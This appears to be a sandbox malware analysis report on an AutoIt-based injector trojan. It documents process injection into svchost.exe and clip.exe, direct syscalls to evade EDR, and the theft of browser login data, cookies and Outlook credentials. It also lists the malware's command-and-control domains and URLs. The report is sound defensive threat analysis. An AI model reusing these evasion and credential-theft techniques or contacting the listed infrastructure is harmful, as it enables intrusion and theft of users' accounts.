            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03104940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0083A66C GetSecurityDescriptorDacl, _memset, GetAclInformation, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_00828189 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_008281AC SetUnhandledExceptionFilter, UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtCreateMutant: Direct from: 0x774635CC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtWriteVirtualMemory: Direct from: 0x77462E3C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtMapViewOfSection: Direct from: 0x77462D1C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtResumeThread: Direct from: 0x774636AC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtProtectVirtualMemory: Direct from: 0x77462F9C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtSetInformationProcess: Direct from: 0x77462C5C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtSetInformationThread: Direct from: 0x774563F9
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtNotifyChangeKey: Direct from: 0x77463C2C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtAllocateVirtualMemory: Direct from: 0x77462BFC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtQueryInformationProcess: Direct from: 0x77462C26
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtResumeThread: Direct from: 0x77462FBC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtReadFile: Direct from: 0x77462ADC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtQuerySystemInformation: Direct from: 0x77462DFC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtDelayExecution: Direct from: 0x77462DDC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtAllocateVirtualMemory: Direct from: 0x77463C9C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtCreateUserProcess: Direct from: 0x7746371C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtWriteVirtualMemory: Direct from: 0x7746490C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtAllocateVirtualMemory: Direct from: 0x774648EC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtQuerySystemInformation: Direct from: 0x774648CC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtQueryVolumeInformationFile: Direct from: 0x77462F2C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtReadVirtualMemory: Direct from: 0x77462E8C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtCreateKey: Direct from: 0x77462C6C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtSetInformationThread: Direct from: 0x77462B4C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtQueryAttributesFile: Direct from: 0x77462E6C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtDeviceIoControlFile: Direct from: 0x77462AEC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtOpenSection: Direct from: 0x77462E0C
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtCreateFile: Direct from: 0x77462FEC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtOpenFile: Direct from: 0x77462DCC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtQueryInformationToken: Direct from: 0x77462CAC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtTerminateThread: Direct from: 0x77462FCC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtAllocateVirtualMemory: Direct from: 0x77462BEC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | NtOpenKeyEx: Direct from: 0x77462B9C
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe | Thread register set: target process: 5956
            Source: C:\Windows\SysWOW64\clip.exe | Thread APC queued: target process: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 20A008
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0083B106 LogonUserW
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_00803D19 GetCurrentDirectoryW, IsDebuggerPresent, GetFullPathNameW, SetCurrentDirectoryW, MessageBoxA, SetCurrentDirectoryW, GetForegroundWindow, ShellExecuteW
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0084411C SendInput, keybd_event
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_008474BB mouse_event
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\s7Okni1gfE.exe"
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0083A66C GetSecurityDescriptorDacl, _memset, GetAclInformation, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_008471FA AllocateAndInitializeSid, CheckTokenMembership, FreeSid
            Source: s7Okni1gfE.exe, WNGaDiurNI.exe, 00000006.00000000.1886445127.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2717334610.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000002.2718506190.0000000001641000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: WNGaDiurNI.exe, 00000006.00000000.1886445127.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2717334610.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000002.2718506190.0000000001641000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: WNGaDiurNI.exe, 00000006.00000000.1886445127.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2717334610.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000002.2718506190.0000000001641000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
            Source: s7Okni1gfE.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: WNGaDiurNI.exe, 00000006.00000000.1886445127.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2717334610.0000000001371000.00000002.00000001.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000002.2718506190.0000000001641000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_008265C4 cpuid
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0085091D GetLocalTime, SystemTimeToFileTime, LocalFileTimeToFileTime, __wsplitpath, _wcscat, _wcscat, GetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, _wcscpy, SetCurrentDirectoryW
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0087B340 GetUserNameW
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_00831E8E __lock, ____lc_codepage_func, __getenv_helper_nolock, _free, _strlen, __malloc_crt, _strlen, __invoke_watson, _free, GetTimeZoneInformation, WideCharToMultiByte, WideCharToMultiByte
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0081DDC0 GetVersionExW, GetCurrentProcess, FreeLibrary, GetNativeSystemInfo, FreeLibrary, FreeLibrary, GetSystemInfo, GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: s7Okni1gfE.exe | Binary or memory string: WIN_81
            Source: s7Okni1gfE.exe | Binary or memory string: WIN_XP
            Source: s7Okni1gfE.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
            Source: s7Okni1gfE.exe | Binary or memory string: WIN_XPe
            Source: s7Okni1gfE.exe | Binary or memory string: WIN_VISTA
            Source: s7Okni1gfE.exe | Binary or memory string: WIN_7
            Source: s7Okni1gfE.exe | Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_00858C4F socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0085923B socket, WSAGetLastError, bind, WSAGetLastError, closesocket
            MITRE ATT&CK Matrix, listed per tactic column (a number in parentheses is the hit count the matrix shows beside that technique; techniques without a number carry no count in the matrix)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
            Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
            Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1569366 | Sample: s7Okni1gfE.exe | Start date: 05/12/2024 | Architecture: WINDOWS | Score: 100

Process tree, signatures and network contacts recovered from the behavior graph:

- Sample (start node)
  - DNS/IP: www.ngmr.xyz, www.zz82x.top, 5 other IPs or domains
  - Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures
  - www.ngmr.xyz: Performs DNS queries to domains with low reputation
  - s7Okni1gfE.exe (started)
    - Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
    - svchost.exe (started)
      - Signature: Maps a DLL or memory area into another process
      - WNGaDiurNI.exe (injected)
        - Signature: Found direct / indirect Syscall (likely to bypass EDR)
        - clip.exe (started)
          - Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
          - WNGaDiurNI.exe (injected)
            - Signature: Found direct / indirect Syscall (likely to bypass EDR)
            - Network: www.ngmr.xyz 54.67.87.110 (ports 49821, 49827, 49833), AMAZON-02US, United States; www.ophthalmo.cloud 217.160.0.207 (ports 49782, 49788, 49794), ONEANDONE-ASBrauerstrasse48DE, Germany; 2 other IPs or domains
          - firefox.exe (started)

Source | Detection | Scanner | Label
s7Okni1gfE.exe | 74% | ReversingLabs | Win32.Trojan.AutoitInject
s7Okni1gfE.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
http://www.ophthalmo.cloud/mgg3/?DTs4CD4=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY23gB1m4CBXHBSkrnrwKbx/qmY6AwmTWdie10g6VbJmKkWlw==&v4=NRh8 | 0% | Avira URL Cloud | safe
http://www.ngmr.xyz/qj8y/ | 100% | Avira URL Cloud | malware
http://www.zz82x.top/fk06/ | 100% | Avira URL Cloud | malware
